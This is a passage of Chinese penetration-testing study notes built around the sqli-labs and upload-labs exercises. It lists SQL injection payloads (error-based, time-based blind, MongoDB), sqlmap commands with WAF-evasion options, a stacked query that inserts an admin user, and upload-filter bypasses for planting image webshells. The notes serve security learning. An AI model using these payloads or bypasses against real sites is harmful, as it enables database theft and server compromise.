ๅฏนaccess่ฟ›่กŒSQLๆต‹่ฏ•ๆ—ถ๏ผŒ้œ€่ฆๅŽป็›ฒ็Œœๆˆ–่€…ๅ€ŸๅŠฉๅญ—ๅ…ธๆฅ่ท‘๏ผŒๅฏไปฅ็”จsqlmapใ€‚ๅณunion select 1,2,3 from adminใ€‚ๅŽ้ข็š„adminๆ˜ฏ็›ฒ็Œœ็š„๏ผŒๆ นๆฎๅ›žๆ˜พ็ป“ๆžœ็ปง็ปญไธ‹ไธ€ๆญฅ ่ทจๆญฅๆณจๅ…ฅ๏ผšไธๅŒ็š„็ฝ‘็ซ™๏ผŒไบซๆœ‰ไบ†ๅŒไธ€ๆ•ฐๆฎๅบ“ใ€‚ๅˆ™ๅฏไปฅๆ นๆฎๆŸไธ€ไธชๅฏไปฅๆธ—้€่ฟ›ๅ…ฅๅพ—ๅˆฐๆ•ๆ„Ÿไฟกๆฏ็š„ๆ•ฐๆฎๅบ“็š„็ฝ‘็ซ™๏ผŒไปฅ่ทจๆญฅๆ”ปๅ‡ป็š„ๆ–นๅผ่Žทๅ–ๅˆฐๆ— ๆณ•ๆณจๅ…ฅๅ…ถ็ฝ‘็ซ™็š„ๅŽๅฐๆ•ฐๆฎใ€‚ ๅฏนๅ…ถไป–ๆ•ฐๆฎๅบ“ๅฆ‚MSsql๏ผŒpostgresql,oracle็ญ‰๏ผŒๅŽŸ็†้€šmysqlไธ€ๆ ท๏ผŒๅฏไปฅๅ€ŸๅŠฉsqlmapๅทฅๅ…ทๆฅ่ท‘ ๅฏนmogodb่€Œ่จ€๏ผŒๅฏไปฅๆ‰‹ๅทฅๆณจๅ…ฅๅ’Œnosql่ฟ›่กŒๆ”ปๅ‡ป ๆž„้€ ๅ›žๆ˜พ:/new_list.php?id=1'}); return ({title:1,content:'2 ็ˆ†ๅบ“:/new_list.php?id=1'}); return ({title:tojson(db),content:'1 ็ˆ†ๅญ—ๆฎต:/new_list.php?id=1'}); return ({title:tojson(db.Authority_confidential.find()[0]),content:'1 MD5ๅœจ็บฟ่งฃๅฏ†ๅณๅฏ ###### ้’ˆๅฏนๆ— ๅ›žๆ˜พๆณจๅ…ฅ:(็›ฒๆณจ่งฃๅ†ณๆฒกๆœ‰ๅ›žๆ˜พ็š„้—ฎ้ข˜) 1.ๆŠฅ้”™็›ฒๆณจ๏ผš ``` selectๆŠฅ้”™็›ฒๆณจ: ' or (select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or ' ' or updatexml(1,concat(0x7e,(version())),0) or ' ' or extractvalue(1,concat(0x7e,database())) or ' updateๆŠฅ้”™็›ฒๆณจ: ' or (select 1 from(select count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or ' ' or updatexml(1,concat(0x7e,(version())),0) or ' ' or extractvalue(1,concat(0x7e,database())) or' deleteๆŠฅ้”™็›ฒๆณจ๏ผš ?id=56+or+(select+1+from(select+count(*),concat(floor(rand(0)*2),0x7e,(database()),0x7e)x+from+information_schema.character_sets+group+by+x)a) ?id=56+or+updatexml+(1,concat(0x7e,database()),0) ?id=56+or+extractvalue(1,concat(0x7e,database())) ``` 2.ๅปถๆ—ถ็›ฒๆณจ: ``` and sleep( if(length(database())=8,5,0))--+ ๅˆคๆ–ญไฝๆ•ฐ and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ ไปŽ1ไฝ็ฝฎๅผ€ๅง‹ๆˆชๅ–1ไฝ๏ผŒๅˆฉ็”จascii้˜ฒๆญขๅทฅๅ…ทๆ— ๆณ•่ฏ†ๅˆซๆˆ–่€…ๅผ•ๅท็š„่ฝฌไน‰๏ผŒๅนถไธ”ๅฏนๅผ€ๅ‘ๆฏ”่พƒๅ‹ๅฅฝ select * from users where id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(3),0)--+ ๆŸฅ็œ‹ๆ‰€ๆœ‰ๆ•ฐๆฎๅบ“ๅ ``` 3.ๅธƒๅฐ”็›ฒๆณจ: ?id=1' and left(version(),3)=5.4--+ 4.็›ฒๆณจๆ— ๅ›žๆ˜พ็š„้—ฎ้ข˜๏ผšdnslogๆณจๅ…ฅ๏ผˆ้œ€่ฆ้ซ˜ๆƒ้™๏ผŒๅฏ่ฏปๅ†™ๆ–‡ไปถ๏ผ‰ ###### ๅ€ŸๅŠฉsqlmapๅทฅๅ…ทๅฎž็Žฐๆ— ๅ›žๆ˜พ็›ฒๆณจ๏ผš ``` python sqlmap.py -u http://192.168.31.200/sqlilabs/Less-5/\?id\=1 --batch -technique E --proxy=http://127.0.0.1:8080 --user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Ubuntu/14.04.6 Chrome/81.0.3990.0 Safari/537.36" --cookie="id=1" --dbs techniqueๅŽ้ข็š„ๅ‚ๆ•ฐ่กจ็คบ่ฟ‡ๆปค็š„็ฑปๅž‹๏ผŒ่ฟ™้‡Œๅฏไปฅๆœ‰้€‰ๆ‹ฉๆ€ง็š„้€‰ๆ‹ฉๆ˜ฏๅฆๅฏๅŠจไปฃ็†๏ผŒๆ”นๅ˜User-agent,cookie็ญ‰ B : ๅŸบไบŽBoolean็š„็›ฒๆณจ๏ผˆBoolean based blind๏ผ‰ Q : ๅ†…่”ๆŸฅ่ฏข๏ผˆInline queries๏ผ‰ T : ๅŸบไบŽๆ—ถ้—ด็š„็›ฒๆณจ๏ผˆtime based blind๏ผ‰ U : ๅŸบไบŽ่”ๅˆๆŸฅ่ฏข๏ผˆUnion query based๏ผ‰ E : ๅŸบไบŽ้”™่ฏฏ๏ผˆerror based๏ผ‰ ๅฆ‚ๆžœ้œ€่ฆ็ป•่ฟ‡WAF๏ผŒ้œ€่ฆๅŠ tamperๅ‚ๆ•ฐ่ฟ›่กŒๆ›ด็ฒพๅ‡†็š„่ฟ‡ๆปค ``` ###### sqlmapๅ€ŸๅŠฉtamperๅฎž็ŽฐๅŠ ๅฏ†payload ``` python sqlmap.py -u http://192.168.31.200/sqlilabs/Less-9/\?id\=1 --proxy=http://127.0.0.1:8080 --user-agent="dog" --cookie="cat" --tamper=base64encode.py --batch --dbs sqlmapๅฎž็Žฐcookieๆณจๅ…ฅ๏ผŒๅณๅœจcookieๅค„ๅŠ ่ฝฝpayload๏ผŒไธๆ–ญ็š„ๅ‘้€ๆ•ฐๆฎๅŒ…,ๆณจๆ„ID=1ๆ”พๅœจไบ†cookieไธญ python sqlmap.py -u http://192.168.31.200/sqlilabs/Less-9/index.php --proxy=http://127.0.0.1:8080 --random-agent --cookie="id=1" --batch --dbs --level 2 sqlmapๅฎž็Žฐๅœจuser-agentๅค„่ฟ›่กŒๆต‹่ฏ•๏ผŒๆญคๆ—ถ็š„useragetไธบโ€œID=1โ€๏ผŒๅนถไธ”ๅ…ถๅ‰้ขๆ— ๆณจๅ…ฅ็‚น๏ผŒlevelไธบ3 python sqlmap.py -u http://192.168.31.200/sqlilabs/Less-9/index.php --proxy=http://127.0.0.1:8080 --cookie="1" --user-agent='id=1' --batch --dbs --level 3 ``` ###### ไบŒๆฌกๆณจๅ…ฅไบง็”Ÿ็š„ๅŽŸ็† ๅœจๆณจๅ†Œ็”จๆˆท็š„ๆ—ถๅ€™๏ผŒๆณจๅ…ฅไบ†ไธ€ไบ›ๆ•ๆ„Ÿ็š„ๆ•ฐๆฎ๏ผŒๅธฆๅ…ฅๅˆฐไบ†ๅฏนๆ–น็š„ๆ•ฐๆฎๅบ“ไธญ๏ผ›ๅœจไฟฎๆ”นๆ•ฐๆฎ็š„ๆ—ถๅ€™๏ผŒไปŽๅฏนๆ–นๆ•ฐๆฎๅบ“้‡Œๅ–ๅ‡บๆฅ่ฟ™ไธชๆ•ๆ„Ÿ็š„ๆ•ฐๆฎ๏ผŒๅนถไธ”่ฟ›่กŒไบ†ๆ‰ง่กŒ.ๅฆ‚่พ“ๅ…ฅไบ† admin'# ็š„็”จๆˆท๏ผŒๆ›ดๆ–ฐ็š„ๆ—ถๅ€™ๅฐ†ๆ›ดๆ–ฐadmin็”จๆˆท็š„ๅฏ†็ ๏ผŒไธ€่ˆฌๆ˜ฏ้…ๅˆ็™ฝ็›’ๅฎก่ฎก็š„ๆ—ถๅ€™ๆ‰ไผš็”จๅˆฐ่ฟ™ไธช ###### ๅ †ๅ ๆŸฅ่ฏข็š„ๅŽŸ็†ๅŠๅˆฉ็”จไปทๅ€ผ๏ผš ?id=1';insert into users(id,username,password) values ('111','222','333');ๅœจๅŽŸๆœ‰็š„SQL่ฏญๅฅไธŠๅŠ ไธŠๅŽ๏ผŒๆ”นๅ˜ไบ†ๆ•ฐๆฎๅบ“็š„็ป“ๆž„ ๆณจๅ…ฅ็š„ๆ—ถๅ€™้œ€่ฆ็ฎก็†ๅ‘˜่ดฆๅทๅฏ†็ ๏ผŒๅฏ†็ ๆ˜ฏๅŠ ๅฏ†ๆ— ๆณ•่งฃๅฏ†ๅ‡บๆฅ๏ผŒๅ †ๅ ๆณจๅ…ฅ่ฟ›่กŒๆ’ๅ…ฅๆ•ฐๆฎ๏ผŒ็”จๆˆท็š„ๅฏ†็ ๆ˜ฏ่‡ชๅฎšไน‰็š„๏ผŒๅฏไปฅๆญฃๅธธ็™ปๅฝ•๏ผŒๅณๆ˜ฏ็”จ้‡ๆ–ฐๆทปๅŠ ็š„็”จๆˆทๅŽป็ฎก็†mysql็š„ๅŽๅฐ่ดฆๆˆท ###### sqlmap็ป•่ฟ‡waf็ญ–็•ฅ๏ผš ``` --user-agent="Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" ๆจกๆ‹Ÿ็™พๅบฆๆœ็ดขๅผ•ๆ“Ž็š„็ˆฌ่™ซ --delay 1 ๅปถ่ฟŸๆ—ถ้—ดๅŽปๅ‘้€ๆ•ฐๆฎๅŒ…่พพๅˆฐ็ป•่ฟ‡ --proxy="....." ๅˆฉ็”จไปฃ็†ๆฑ ๅŽป่ฎฟ้—ฎ --tamper="space2morehash.py" ๅˆฉ็”จไธ€ไบ›ๆ‰นๅค„็†่„šๆœฌๅฏนpayloadๅ…ˆๅšไฟฎๆ”นไน‹ๅŽๅœจๅŽป่ฎฟ้—ฎ -r data.txt ้€š่ฟ‡ๆŠ“ๅ–็š„ๆ•ฐๆฎๅŒ…่ฟ›่กŒ็‰นๅฎšๅœฐๆ–น็š„ไผช้€ ๏ผŒๅฆ‚ไธๅธธ่ง็š„ๅญ—ๆฎต็š„ไผช้€ ่ฟ›่กŒๅ‘ๅŒ… python sqlmap.py -r 1.txt --proxy=http://127.0.0.1:8080 ็”จ่‡ชๅทฑ็š„ๆ•ฐๆฎๅŒ…ๅ‘้€ๆ•ฐๆฎ,้ป˜่ฎคๆ˜ฏgetๆ–นๅผ๏ผŒไนŸๅฏไปฅๆ”นไธบpostๆณจๅ…ฅ ไนŸๅฏไปฅ้€š่ฟ‡php/python็š„ไธญ่ฝฌ่„šๆœฌ๏ผŒsqlmap่ฎฟ้—ฎ่‡ชๅทฑๆœฌๅœฐ็š„็ฝ‘็ซ™๏ผŒ่‡ชๅทฑๆœฌๅœฐ็ฝ‘็ซ™ๅŽป่ฎฟ้—ฎ่ฟœ็จ‹็š„้œ€่ฆๆณจๅ…ฅ็š„็ฝ‘็ซ™ ``` ### 11.upload-labs ๅฏปๆ‰พไธŠไผ ๆผๆดž็š„ๅ…ณ้”ฎ่ฆ็ด ๏ผš ้’ˆๅฏนๅบ”็”จ็š„ๅŠŸ่ƒฝไธ‹ๆ‰‹๏ผŒๆ˜ฏๅฆๅญ˜ๅœจๅฏไปฅไธŠไผ ็š„ๅœฐๆ–น ๅฏปๆ‰พๅ…ถไป–ๅทฒ็Ÿฅ็š„ๆผๆดžๆˆ–่€…ๅทฒ็Ÿฅcmsๅ…ฌๅผ€็š„ๆผๆดž่ฟ›่กŒๅˆฉ็”จ ๅฆ‚nginxๆ–‡ไปถ่งฃๆžๆผๆดž๏ผŒๅฐ†ๅ›พ็‰‡้‡Œ่พน็š„ๅŽ้—จๆ–‡ไปถ็ป™่งฃๆžๅ‡บๆฅ็š„๏ผŒ(nginx+php็š„็”จๆˆท้…็ฝฎไธๅฝ“็š„ๆผๆดž) ๅฆ‚Weblogic ไปปๆ„ๆ–‡ไปถไธŠไผ ๆผๆดž๏ผˆCVE-2018-2894๏ผ‰ ###### ๆ–‡ไปถไธŠไผ ็ป•่ฟ‡ๆ€่ทฏ๏ผš ``` ๅ‰็ซฏ็ป•่ฟ‡๏ผšๅ‰็ซฏjsๆ ก้ชŒ๏ผŒๆŠ“ๅŒ…1.pngไฟฎๆ”นไธบ1.php MIME็ป•่ฟ‡๏ผšๆŠ“ๅŒ…ไฟฎๆ”นcontent-typeไธบๅ›พ็‰‡็ฑปๅž‹๏ผšimage/jpegใ€image/pngใ€image/gif php5็ป•่ฟ‡๏ผšๆŠ“ๅŒ…ไฟฎๆ”นไธบ1.php5ไธŠไผ ๏ผŒ่ฎฟ้—ฎๅ›žๅคๅŒ…้‡Œๆœ‰ไธŠไผ ่ทฏๅพ„ ็‚น+็ฉบๆ ผ+็‚น็ป•่ฟ‡๏ผšไผช้€ ไธบ1.php. .ๆฅ็ป•่ฟ‡ ๅคงๅฐๅ†™็ป•่ฟ‡๏ผšไผช้€ ไธบ6.PHp๏ผŒๅนถๅœจ้‡ๅ‘ๅ™จไธญ่Žทๅ–ๆ–‡ไปถไธŠไผ ๅœฐๅ€ ็ฉบๆ ผ็ป•่ฟ‡๏ผšไผช้€ ไธบ7.php ๏ผŒๅนถๅœจ้‡ๅ‘ๅ™จไธญ่Žทๅ–ๆ–‡ไปถไธŠไผ ๅœฐๅ€ ็‚น็ป•่ฟ‡๏ผšไผช้€ ไธบ8.php. ::$DATA็ป•่ฟ‡๏ผšไผช้€ ไธบ9.php::DATA. ๅŒๅ†™็ป•่ฟ‡๏ผšไผช้€ ไธบ1.pphphp ๅ›พ็‰‡้ฉฌ้…ๅˆๆ–‡ไปถๅŒ…ๅซๆผๆดž๏ผšๅฐ†phpไปฃ็ ๆ’ๅ…ฅๅˆฐๅ›พ็‰‡ๆ ผๅผ็š„ๆ–‡ไปถไธญ๏ผŒ็›ดๆŽฅ่ฎฟ้—ฎๅ›พ็‰‡ๅนถไธ่ƒฝๆŠŠๅ›พ็‰‡ๅฝ“ๅšPHP่งฃๆž๏ผŒๅ› ๆญค่ฟ˜้œ€่ฆๅˆฉ็”จๆ–‡ไปถๅŒ…ๅซๆผๆดž http://1.117.52.219:81/upload-labs/include.php?file=upload/4720211213174512.png ่ขซๅฝ“ๆˆphp่งฃๆž .htaccess็ป•่ฟ‡๏ผšๅ…ˆไธŠไผ ไธ€ไธช.htaccessๆ–‡ไปถ๏ผŒSetHandler application/x-httpd-php ่ฟ™ๆ ทๆ‰€ๆœ‰ๆ–‡ไปถ้ƒฝไผšๅฝ“ๆˆphpๆฅ่งฃๆžใ€‚ไผช้™ๆ€ๆŠ€ๆœฏๆ˜ฏๆŒ‡ๅฑ•็คบๅ‡บๆฅ็š„ๆ˜ฏไปฅhtmlไธ€็ฑป็š„้™ๆ€้กต้ขๅฝขๅผ๏ผŒไฝ†ๅ…ถๅฎžๆ˜ฏ็”จASPไธ€็ฑป็š„ๅŠจๆ€่„šๆœฌๆฅๅค„็†็š„ใ€‚ %00ๆˆชๆ–ญๆกไปถ๏ผšphp็‰ˆๆœฌๅฐไบŽ5.3.4๏ผŒphp็š„magic_quotes_gpcไธบOFF็Šถๆ€๏ผŒไธŠไผ 12.php%00 ๏ผŒ่ขซ่งฃๆžไธบ12.phpPOSTไธไผšๅƒGETๅฏน%00่ฟ›่กŒ่‡ชๅŠจ่งฃ็ ๏ผŒ้œ€่ฆๅœจไบŒ่ฟ›ๅˆถไธญ่ฟ›่กŒไฟฎๆ”นใ€‚ ๆ–‡ไปถๅคด้ƒจไฟกๆฏ็ป•่ฟ‡๏ผšไธๅŒๆ ผๅผๅŽ็ผ€็š„ๅ›พ็‰‡็”จ็ผ–่พ‘ๅ™จๆ‰“ๅผ€ไน‹ๅŽๅคดๅ‡ ไธชๅญ—ๆฏไธๅŒ๏ผŒ้€š่ฟ‡ไผช้€ ๆ–‡ไปถ็š„ๅคด้ƒจไฟกๆฏ็ป•่ฟ‡ๆ–‡ไปถ็ฑปๅž‹ๆ ก้ชŒ ไบŒๆฌกๆธฒๆŸ“้…ๅˆๆกไปถ็ซžไบ‰๏ผšๆ–‡ไปถๅˆฐไบ†ๆœๅŠกๅ™จๆ‰่ฟ›่กŒ็š„่ฟ‡ๆปคๆ˜ฏๅญ˜ๅœจไบŒๆฌกๆธฒๆŸ“้—ฎ้ข˜็š„๏ผŒ้…ๅˆๆกไปถ็ซžไบ‰ๅฏไปฅๅฎž็ŽฐๅŽ้—จๅ†™ๅ…ฅ๏ผŒๆ–‡ไปถๅญ˜ๅœจ็š„้‚ฃไธ€ๅˆน้‚ฃ๏ผŒๅฏนๆ–‡ไปถ่ฟ›่กŒ้‡ๅค่ฎฟ้—ฎ๏ผŒๆญคๆ—ถๆ–‡ไปถไธไผš่ขซ้‡ๅ‘ฝๅ๏ผŒphpๆ–‡ไปถ็•™ไธ‹ๆฅไบ†ใ€‚่€Œๅฆ‚ๆžœๆ–‡ไปถๅœจไธŠไผ ไน‹ๅ‰ๅฐฑ่ฟ‡ๆปคไบ†ๆ–‡ไปถ็ฑปๅž‹ๆ˜ฏๆฒกๆœ‰ไปปไฝ•้—ฎ้ข˜็š„ใ€‚ ๆ–‡ไปถๅคนๆ–‡ไปถๅๅญ—ๆทท็”จ๏ผšๆไบค1.jpg๏ผŒไฟๅญ˜ไธบupload-19.php%00 ๅนถไธ”ๆ”นๅ˜hex็ผ–็ ๏ผŒไฝฟ%00ไธบ00253030๏ผŒๆˆ–ๆไบคupload-19.php/. ่”ๅˆMIMEไธŽๅ›พ็‰‡ๆ ผๅผๆ•ฐ็ป„็ป•่ฟ‡๏ผšContent-Disposition: form-data; name="save_name[0]" upload-20.php Content-Disposition: form-data; name="save_name[2]" jpg ๅฏปๆ‰พไธญ้—ดไปถ็š„้”™่ฏฏ๏ผšๅฆ‚็‰นๅฎš็š„nginx็‰ˆๆœฌๅญ˜ๅœจๆ–‡ไปถ่งฃๆžๆผๆดž๏ผŒๅฏไปฅๅˆฉ็”จ่ฟ™็‚น็›ดๆŽฅไธŠไผ ๅ›พ็‰‡้ฉฌๅพ—ๅˆฐwebshellๆƒ้™ ``` ###### ๅ‡ ็งๅธธ่ง็š„ไธญ้—ดไปถ็š„ๆ–‡ไปถไธŠไผ ๆผๆดž๏ผˆ้œ€่ฆ็‰นๅฎš็‰ˆๆœฌ+ๅฏนๆ–นๆฒกๆœ‰ๆ‰“่ฟ‡็›ธๅบ”่กฅไธ๏ผŒvulhubไธŠๅฏไปฅๅค็Žฐ๏ผ‰๏ผš apacheๆ–‡ไปถ่งฃๆžๆผๆดž๏ผš ไธŠไผ ๆ–‡ไปถa.php.xxx่ขซไฝŽ็‰ˆๆœฌ็š„apche่งฃๆžไธบa.php๏ผŒ้ป‘ๅๅ•ๅฏ็ป•่ฟ‡๏ผŒapche่ฏ†ๅˆซๆ–‡ไปถๅŽ็ผ€๏ผŒ่ฏ†ๅˆซๅˆฐxxxไธๆ‰ง่กŒ๏ผŒ่ฏ†ๅˆซๅˆฐphpๅฏๆ‰ง่กŒ๏ผŒไบค็ป™phpๆฅ็ฎก็†๏ผŒphp่ฏ†ๅˆซๅˆฐไบ†xxxๆ— ๆณ•่ฏ†ๅˆซ๏ผŒๆ นๆฎphp็š„้…็ฝฎๆ–‡ไปถ็กฎๅฎš่ƒฝๅฆ่ฏ†ๅˆซ๏ผŒไธ€่ˆฌๅช่ƒฝ่ฏ†ๅˆซphp๏ผŒphp3๏ผŒphp4.php5๏ผŒpht๏ผŒphtml๏ผŒ่€Œๅฆ‚ๆžœphp็š„ๆญฃๅˆ™่ฟ‡ๆปคๆฒกๆœ‰่ขซไฟฎๆ”น๏ผŒๅˆ™ไผš่ขซ่ฎคไธบๆ— ๆณ•่ฏ†ๅˆซ๏ผŒๆ˜พ็คบๅ‡บๆญคๆ–‡ไปถ็š„ๆบ็ ๆฅ apacheๆข่กŒ่งฃๆžๆผๆดž๏ผš Apache HTTPDๆ˜ฏไธ€ๆฌพHTTPๆœๅŠกๅ™จ๏ผŒๅฎƒๅฏไปฅ้€š่ฟ‡mod_phpๆฅ่ฟ่กŒPHP็ฝ‘้กตใ€‚ๅ…ถ2.4.0~2.4.29็‰ˆๆœฌไธญๅญ˜ๅœจไธ€ไธช่งฃๆžๆผๆดž๏ผŒๅœจ่งฃๆžPHPๆ—ถ๏ผŒ1.php\x0Aๅฐ†่ขซๆŒ‰็…งPHPๅŽ็ผ€่ฟ›่กŒ่งฃๆž๏ผŒๅฏผ่‡ด็ป•่ฟ‡ไธ€ไบ›ๆœๅŠกๅ™จ็š„ๅฎ‰ๅ…จ็ญ–็•ฅใ€‚ Nginx ่งฃๆžๆผๆดž๏ผš ไธŠไผ ไธ€ๅผ ๅธฆๆœ‰phpๆ–‡ๆœฌๆ–‡ไปถ็š„ๅ›พ็‰‡ๅŽ็ผ€ๆ ผๅผ็š„ๆ–‡ไปถ๏ผŒๅœจๆปก่ถณ่ฟ™็งๆผๆดž็š„ๆ–‡ไปถๆ—ถ๏ผŒๆ˜ฏไผš็ˆ†ๅ‡บphpไฟกๆฏ็š„๏ผŒ่งฆๅ‘ๆญคๆผๆดž็š„ๆ–นๆณ•ๆ˜ฏๅœจไธŠไผ ็š„ๅ›พ็‰‡้ฉฌ็š„ๅœฐๅ€็š„ๅŽ่พน็›ดๆŽฅ่ทŸ/xxxx.phpๅฝ“ๆˆphpๆฅ่ฎฟ้—ฎใ€‚่ฏฅไธŽNginxใ€php็‰ˆๆœฌๆ— ๅ…ณ๏ผŒๅฑžไบŽ็”จๆˆท้…็ฝฎไธๅฝ“้€ ๆˆ็š„่งฃๆžๆผๆดžใ€‚ -->ๅˆคๆ–ญๆœ‰ๆฒกๆœ‰ๆญคๆผๆดž๏ผŒๆ‰“ๅผ€ไธ€ไธช็ฝ‘็ซ™็š„ไธ€ไธชๅ›พ็‰‡็š„ๅœฐๅ€๏ผŒๅœจๅœฐๅ€ๅŽ่พนๆ‹ผๆŽฅ/xx.php็œ‹ๆ•ˆๆžœ๏ผŒๅฆ‚ๆžœ่ฟ”ๅ›ž็š„ๆ˜ฏ ้”™่ฏฏๅˆ™ๆฒกๆœ‰๏ผŒๅฆ‚ๆžœ่ฟ”ๅ›žไนฑ็ ๅˆ™ๆ˜ฏๅญ˜ๅœจ่งฃๆžๆผๆดž็š„๏ผŒๅช้œ€่ฆๆ‰พไธ€ไธชไธŠไผ ็‚นๅฐฑๅฏไปฅ็ช็ ดใ€‚ Nginx ๆ–‡ไปถๅ้€ป่พ‘ๆผๆดž๏ผš ไธŠไผ ไธ€ไธชๆ–‡ไปถไธบ1.gif็š„ๅ›พ็‰‡้ฉฌ๏ผŒไธŠไผ ็š„ๆ—ถๅ€™ไผช้€ ๆ•ฐๆฎไธบ1.gif ๆณจๆ„ๆœ‰็ฉบๆ ผ๏ผŒไธŠไผ ไน‹ๅŽๆ‹ฟๅˆฐ็œŸๅฎžๅœฐๅ€่ฟ›่กŒ่ฎฟ้—ฎ็š„ๆ—ถๅ€™๏ผŒไผช้€ ๅœฐๅ€ๅฆ‚ไธ‹......./1.gif[0x20][0x00].php๏ผŒๅ…ถไธญ0x่กจ็คบๅๅ…ญ่ฟ›ๅˆถ็ผ–็  -->่ฟ™ไธชๆผๆดžๅ…ถๅฎžๅ’Œไปฃ็ ๆ‰ง่กŒๆฒกๆœ‰ๅคชๅคงๅ…ณ็ณป๏ผŒๅ…ถไธป่ฆๅŽŸๅ› ๆ˜ฏ้”™่ฏฏๅœฐ่งฃๆžไบ†่ฏทๆฑ‚็š„URI๏ผŒ้”™่ฏฏๅœฐ่Žทๅ–ๅˆฐ็”จๆˆท่ฏทๆฑ‚็š„ๆ–‡ไปถๅ๏ผŒๅฏผ่‡ดๅ‡บ็Žฐๆƒ้™็ป•่ฟ‡ใ€ไปฃ็ ๆ‰ง่กŒ็š„่ฟžๅธฆๅฝฑๅ“ใ€‚ ###### ๅฎž้™…ๅบ”็”จไธญ๏ผŒๅฆ‚ไฝ•ๅˆคๆ–ญๆ–‡ไปถไธŠไผ ๆผๆดž๏ผš ้ฆ–ๅ…ˆ้€š่ฟ‡ๅญ—ๅ…ธๆ‰ซๆๆ•ๆ„Ÿ็›ฎๅฝ•๏ผŒๅฏปๆ‰พๅฏไปฅไธŠไผ ๆ–‡ไปถ็š„ๅœฐๅ€๏ผŒๆˆ–่€…ๆ‰‹ๅŠจๅฏปๆ‰พ็ฝ‘็ซ™ไธŠ็ฑปไผผไผšๅ‘˜ไธญๅฟƒ็š„ๅฏไปฅไธŠไผ ๆ–‡ไปถ็š„ๅœฐๆ–น ๅ…ถๆฌกๅˆคๆ–ญๆญค็ฝ‘็ซ™็š„ไธญ้—ดไปถ็ฑปๅž‹ๅŠ็‰ˆๆœฌ๏ผŒๅฏนๆฏ”ๆ˜ฏๅฆๆœ‰ๆญค็‰ˆๆœฌๅฏไปฅๅˆฉ็”จ็š„EXP๏ผŒ่ฟ›่กŒๆผๆดžๅˆฉ็”จ ๆˆ–่€…้€š่ฟ‡ๅฎž้™…็š„ๆƒ…ๅ†ต่‡ชๅทฑๆ‰‹ๅทฅๆต‹่ฏ•๏ผŒ็ป•่ฟ‡ๅŽๅฐๅธธ่ง็š„ไฟๆŠคๆœบๅˆถ๏ผŒๅฆ‚้ป‘็™ฝๅๅ•MIMEๆ–‡ไปถๅ†…ๅฎน๏ผŒๅคงๅฐๅ†™็ป•่ฟ‡็ญ‰็ญ‰ๆ–นๆณ• ๆ นๆฎ็ฝ‘็ซ™็ป™ๅ‡บ็š„CMSๆˆ–่€…ๅ…ถไป–็ผ–่พ‘ๅ™จ๏ผŒไปŽCMS็š„ๆผๆดžๆˆ–่€…็ผ–่พ‘ๅ™จ็š„ๆผๆดžไธ‹ๆ‰‹่ฟ›่กŒๆ•ๆ„Ÿๆ–‡ไปถไธŠไผ  ๅฏปๆ‰พ็ฝ‘็ซ™ไธŠๆ˜ฏๅฆ่ฐƒ็”จไบ†ไธ€ไบ›ๅ…ถไป–็š„ๅฏไปฅๅ†™ๅ…ฅๆ–‡ไปถ็š„ไธ‰ๆ–นๆœๅŠก๏ผŒๆ นๆฎไธญ้—ดไปถ็š„็‰ˆๆœฌ๏ผŒๅฏปๆ‰พๆ–ฐ็š„CVEๆผๆดž่ฟ›่กŒๆต‹่ฏ• ### 12.่ฐทๆญŒ่ฏญๆณ• ###### ๅŸบๆœฌ่ฏญๆณ•๏ผš ``` "program google"๏ผš้ป˜่ฎคๆœ็ดขๆ˜ฏand้€ป่พ‘ใ€‚่พ“ๅ…ฅๅ…ณ้”ฎๅญ—ๅŽ่ฟ›่กŒๆœ็ดขๆ—ถ.๏ผŒ็ป“ๆžœๅŒ…ๅซโ€œprogramโ€ๅ’Œโ€œgoogleโ€็š„ๆ–‡ไปถๅ†…ๅฎนใ€‚ "program OR google"๏ผšไธ็กฎๅฎš่ฆๆœ็ดข็š„ๅ†…ๅฎน๏ผŒๆˆ–่€…ๆƒณๆœ็ดขไธคไธชไธญ็š„ไปปๆ„ไธ€ไธช๏ผŒ้‚ฃไนˆๅฐฑ่ฆไฝฟ็”จๅ…ณ้”ฎ่ฏโ€œORโ€ใ€‚ "programgoogle"๏ผšไธๅธŒๆœ›่ฟ™ไธคไธชๅ•่ฏไน‹้—ดๆœ‰ไปปไฝ•ๅ…ถไป–็š„ๅ†…ๅฎน๏ผŒ่ฆไฝฟ็”จๅŒๅผ•ๅทๆŠŠๆœ็ดข็š„ๅ†…ๅฎน็ป„ๆˆไธ€ไธช่ฏ็ป„ใ€‚ "program -google"๏ผšๅชๆƒณ็œ‹ๅˆฐโ€œprogramโ€็š„ๅ†…ๅฎน๏ผŒ่€ŒไธๅธŒๆœ›็œ‹ๅˆฐโ€œgoogleโ€็š„ๅ†…ๅฎน๏ผŒๅฐฑๅฏไปฅๆŠŠโ€œ-โ€ๅบ”็”จๅˆฐๆœ็ดขๅฝ“ไธญๅŽปใ€‚ "+www google"๏ผšๅธธ็”จ็š„โ€œwwwโ€ๅ’Œโ€œtheโ€๏ผŒไผš่ขซgoogle่‡ชๅŠจๅฟฝ็•ฅใ€‚ไธๅฟฝ็•ฅ่ฟ™ไบ›่ฏ่ฟ›่กŒๆŸฅ่ฏข๏ผŒๅœจ่ฟ™ไบ›ๅ…ณ้”ฎ่ฏ็š„ๅ‰้ขๅŠ โ€œ+โ€ใ€‚ โ€œ"l*Messi"โ€๏ผšๆœ็ดขโ€œLionel Messiโ€็š„ๅ†…ๅฎน๏ผŒ่พ“ๅ…ฅโ€œ"l*Messi"โ€่ฟ›่กŒๆŸฅ่ฏข๏ผŒๆญคๅค„ๆ•ดไธชๅญ—็ฌฆไธฒๆ˜ฏ่ฆ็”จๅŒๅผ•ๅทๆ‹ฌไฝ็š„ใ€‚ ``` ###### ้ซ˜็บง่ฏญๆณ•๏ผš ``` โ€œintitle:program moonโ€๏ผšๅฐ†ๆœ็ดข็š„่Œƒๅ›ดๅฑ€้™ๅœจๆ ‡้ข˜ไธŠใ€‚ๅœจๅ…ณ้”ฎ่ฏๅ‰้ขๅŠ ไธŠ่ฟ™ไธช๏ผŒๅฐฑไผšๅชๅฏน็ฝ‘้กต็š„ๆ ‡้ข˜่ฟ›่กŒๆœ็ดขๅนถไธ”้…ๅฏนใ€‚ 